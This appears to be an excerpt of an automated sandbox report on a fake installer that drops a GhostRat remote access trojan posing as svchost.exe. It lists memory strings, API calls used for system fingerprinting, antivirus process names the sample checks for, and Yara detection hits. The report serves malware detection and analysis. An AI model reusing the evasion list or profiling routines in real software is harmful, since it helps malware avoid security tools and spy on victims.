                      Source: svchost.exe, 0000000C.00000002.3346680855.0000000004900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 min642294Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                      Source: upupoo-classicshell.exeBinary or memory string: Shell_TrayWnd
                      Source: upupoo-classicshell.exeBinary or memory string: Progman
                      Source: upupoo-classicshell.exe, 00000003.00000000.2164624884.0000000000C33000.00000002.00000001.01000000.00000006.sdmp, upupoo-classicshell.exe, 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp, upupoo-classicshell.exe, 0000000B.00000002.2354492979.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: UStartMenu: hook failed: 0x%08XStartMenu: can't find taskbar, retryingStartMenu: failed to open process %dStartMenu: failed to get process nameStartMenu: found wrong process %sexplorer.exeStartMenu: can't find Progman, retryingProgmanApplicationManager_DesktopShellWindowSoftware\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txtStartMenu: hooking ExplorerClassicStartMenuDLL.dllClassicStartMenu.StartMenuMsgATL:%pStartMenu: Taskbar CreatedClassicStartMenu.CStartHookWindowp[
                      Source: svchost.exe, 0000000C.00000002.3347030339.000000000492C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: minProgram Manager
                      Source: svchost.exe, 00000004.00000002.3346595282.0000000004500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 192.168.2.5 0 min642294Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free2 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                      Source: upupoo-classicshell.exe.0.drBinary or memory string: UStartMenu: hook failed: 0x%08XStartMenu: can't find taskbar, retryingStartMenu: failed to open process %dStartMenu: failed to get process nameStartMenu: found wrong process %sexplorer.exeStartMenu: can't find Progman, retryingProgmanApplicationManager_DesktopShellWindowSoftware\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txtStartMenu: hooking ExplorerClassicStartMenuDLL.dllClassicStartMenu.StartMenuMsgATL:%pStartMenu: Taskbar CreatedClassicStartMenu.CStartHookWindowp[A
                      Source: upupoo-classicshell.exe.0.drBinary or memory string: @StartMenu: end message loopStartMenu: start message loopChangeWindowMessageFilterExTaskbarCreatedShell_TrayWndStartMenu: exit (mutex exists)StartHookWindowStartMenu: mutex %sClassicStartMenu.Mutex.%s.%sDefault-nohook-backup -xml -reloadsettings-exit-settings-open-toggle-togglenew-runasClassicShell.admxClassicShell.admlClassicShellADMX.txtClassicStartMenu.admxClassicStartMenu.admlClassicStartMenuADMX.txt.dll-saveadmx -cmd %s%s
                      Source: upupoo-classicshell.exe, 00000003.00000000.2164624884.0000000000C33000.00000002.00000001.01000000.00000006.sdmp, upupoo-classicshell.exe, 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp, upupoo-classicshell.exe, 0000000B.00000002.2354492979.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: StartMenu: end message loopStartMenu: start message loopChangeWindowMessageFilterExTaskbarCreatedShell_TrayWndStartMenu: exit (mutex exists)StartHookWindowStartMenu: mutex %sClassicStartMenu.Mutex.%s.%sDefault-nohook-backup -xml -reloadsettings-exit-settings-open-toggle-togglenew-runasClassicShell.admxClassicShell.admlClassicShellADMX.txtClassicStartMenu.admxClassicStartMenu.admlClassicStartMenuADMX.txt.dll-saveadmx -cmd %s%s
                      Source: upupoo-classicshell.exeBinary or memory string: StartMenu: can't find Progman, retrying
                      Source: C:\Windows\System32\lsass.exeCode function: 1_2_00000140ADFD0470 cpuid 1_2_00000140ADFD0470
                      Source: C:\Users\user\Desktop\setupa.exeCode function: EnumSystemLocalesW,0_2_00007FF689731AA4
                      Source: C:\Users\user\Desktop\setupa.exeCode function: EnumSystemLocalesW,0_2_00007FF689731BA4
                      Source: C:\Users\user\Desktop\setupa.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF68973210C
                      Source: C:\Users\user\Desktop\setupa.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF689641D98
                      Source: C:\Users\user\Desktop\setupa.exeCode function: __crtGetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,0_2_00007FF68964489A
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: GetLocaleInfoA,3_2_00C2FF7B
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,wsprintfW,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,4_2_04DF5430
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,wsprintfW,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,12_2_052B5430
                      Source: C:\Users\user\Desktop\setupa.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689644E3A __crtFlsAlloc,GetSystemTimeAsFileTime,0_2_00007FF689644E3A
                      Source: C:\Program Files\upupoo-classicshell.exeCode function: 3_2_00C21CE0 ?DllLogToFile@@YAXPB_W0ZZ,?DllLogToFile@@YAXPB_W0ZZ,GetModuleHandleW,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?WaitDllInitThread@@YAXXZ,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?DllLogToFile@@YAXPB_W0ZZ,MessageBoxW,_memset,DoEnvironmentSubstW,GetFileAttributesW,GetModuleFileNameW,CoInitialize,ShellExecuteW,CoUninitialize,?DllGetSettingBool@@YA_NPB_W@Z,?DllLogToFile@@YAXPB_W0ZZ,RegCloseKey,?DllGetSettingInt@@YAHPB_W@Z,Sleep,RegCloseKey,?WaitDllInitThread@@YAXXZ,?DllGetSettingBool@@YA_NPB_W@Z,?DllLogToFile@@YAXPB_W0ZZ,?DllGetSettingInt@@YAHPB_W@Z,Sleep,?WaitDllInitThread@@YAXXZ,RegSetValueExW,_memset,DoEnvironmentSubstW,DoEnvironmentSubstW,_memset,DoEnvironmentSubstW,_memset,CreateProcessW,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetLastError,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,FormatMessageW,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,MessageBoxW,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,?DllLoadStringEx@@YA?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@H@Z,MessageBoxW,RegCloseKey,?WaitDllInitThread@@YAXXZ,CoInitialize,?DllExecuteNamedCommand@@YA_NPB_W@Z,PeekMessageW,PeekMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,PeekMessageW,CoUninitialize,?WaitDllInitThread@@YAXXZ,GetCurrentDirectoryW,PathAppendW,PathAddExtensionW,LoadLibraryExW,?DllLoadTranslationResources@@YAXPAUHINSTANCE__@@PAH@Z,?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z,?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z,?DllSaveAdmx@@YA_NW4TSettingsComponent@@PBD11@Z,GetModuleFileNameW,PathFindFileNameW,SetCurrentDirectoryW,CoInitialize,SHEvaluateSystemCommandTemplate,_memset,ShellExecuteExW,CoUninitialize,?WaitDllInitThread@@YAXXZ,CoInitialize,?DllImportSettingsXml@@YA_NPB_W@Z,CoUninitialize,CoInitialize,?DllExportSettingsXml@@YA_NPB_W@Z,CoUninitialize,?MiniDumpType@@3W4_MINIDUMP_TYPE@@A,?MiniDumpType@@3W4_MINIDUMP_TYPE@@A,?MiniDumpType@@3W4_MINIDUMP_TYPE@@A,?TopLevelFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z,?TopLevelFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z,SetUnhandledExceptionFilter,GetUserNameW,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationW,GetUserObjectInformationW,_malloc,GetUserObjectInformationW,__wcsicoll,?DllLogToFile@@YAXPB_W0ZZ,FindWindowExW,FindWindowExW,GetWindowThreadProcessId,CreateMutexW,GetLastError,GetLastError,GetLastError,AllowSetForegroundWindow,FindWindowW,AllowSetForegroundWindow,?FindTaskBar@@YAPAUHWND__@@K@Z,RegisterWindowMessageW,PostMessageW,WaitForSingleObject,ReleaseMutex,?DllLogToFile@@YAXPB_W0ZZ,GetDesktopWindow,FindWindowExW,RegisterWindowMessageW,PostMessageW,ReleaseMutex,OleInitialize,?DllUpdateSettings@@3_2_00C21CE0
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689727528 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00007FF689727528
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689641433 Concurrency::details::ResourceManager::RetrieveSystemVersionInformation,GetVersionExW,0_2_00007FF689641433
                      Source: C:\Users\user\Desktop\setupa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: svchost.exeBinary or memory string: acs.exe
                      Source: svchost.exeBinary or memory string: avcenter.exe
                      Source: svchost.exeBinary or memory string: kxetray.exe
                      Source: svchost.exeBinary or memory string: vsserv.exe
                      Source: svchost.exeBinary or memory string: avp.exe
                      Source: svchost.exeBinary or memory string: cfp.exe
                      Source: svchost.exeBinary or memory string: KSafeTray.exe
                      Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: svchost.exeBinary or memory string: 360Safe.exe
                      Source: svchost.exeBinary or memory string: 360tray.exe
                      Source: svchost.exeBinary or memory string: rtvscan.exe
                      Source: svchost.exeBinary or memory string: TMBMSRV.exe
                      Source: svchost.exeBinary or memory string: ashDisp.exe
                      Source: svchost.exeBinary or memory string: 360Tray.exe
                      Source: svchost.exeBinary or memory string: avgwdsvc.exe
                      Source: svchost.exeBinary or memory string: AYAgent.aye
                      Source: svchost.exeBinary or memory string: RavMonD.exe
                      Source: svchost.exeBinary or memory string: QUHLPSVC.EXE
                      Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe
                      Source: svchost.exeBinary or memory string: Mcshield.exe
                      Source: svchost.exeBinary or memory string: K7TSecurity.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected GhostRat
                      Source: Yara matchFile source: 4.3.svchost.exe.4553003.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c6c05b.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4453003.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.4853003.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.67335a3.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4c705bf.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c6c05b.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.51305bf.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4df0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4453003.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c6c05b.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.287105b.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4df0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c3300f.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.49845a3.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4553003.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4513003.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.4913003.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4513003.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4513003.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4513003.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c3a05b.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.287105b.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.52b0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.52b0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4c705bf.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.286e05b.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.4853003.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.51305bf.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.45845a3.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.49845a3.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c6c05b.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.283c05b.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.45845a3.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.49845a3.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.286e05b.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.4853003.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.67335a3.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.67015a3.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.4913003.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4bd1004.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.286e05b.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.4853003.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.286e05b.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.67015a3.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.287105b.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4bd1004.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.49845a3.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.287105b.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.45845a3.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.283c05b.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.45845a3.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3043302904.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246719024.000000000283B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3347088080.0000000004584000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3354222266.0000000006700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318618858.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3292327565.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246797998.000000000286D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3043504278.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3346097174.0000000004852000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318479368.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3043302904.0000000002870000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246719024.000000000286D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318739703.0000000004984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318479368.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3349931132.00000000052B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3348722522.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3292327565.0000000002870000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246842041.0000000004552000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318739703.0000000004912000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2338206272.0000000004852000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3354222266.0000000006733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3292521835.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3347172652.0000000004984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3349260884.0000000005130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2235102743.0000000004452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3292583935.0000000004512000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246842041.0000000004584000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2308042453.0000000002C32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3043573393.0000000004512000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3636, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected GhostRat
                      Source: Yara matchFile source: 4.3.svchost.exe.4553003.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c6c05b.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4453003.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.4853003.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.67335a3.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4c705bf.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c6c05b.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.51305bf.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4df0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4453003.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c6c05b.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.287105b.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4df0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c3300f.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.49845a3.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4553003.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4513003.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.4913003.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4513003.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4513003.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.4513003.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c3a05b.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.287105b.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.52b0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.52b0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4c705bf.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.286e05b.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.4853003.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.51305bf.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.45845a3.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.49845a3.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.2c6c05b.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.283c05b.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.45845a3.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.49845a3.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.286e05b.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.4853003.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.67335a3.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.67015a3.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.4913003.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4bd1004.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.286e05b.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.3.svchost.exe.4853003.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.286e05b.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.67015a3.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.287105b.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.28a305b.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.4bd1004.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.svchost.exe.49845a3.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.287105b.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.45845a3.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.283c05b.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svchost.exe.45845a3.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3043302904.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246719024.000000000283B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3347088080.0000000004584000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3354222266.0000000006700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
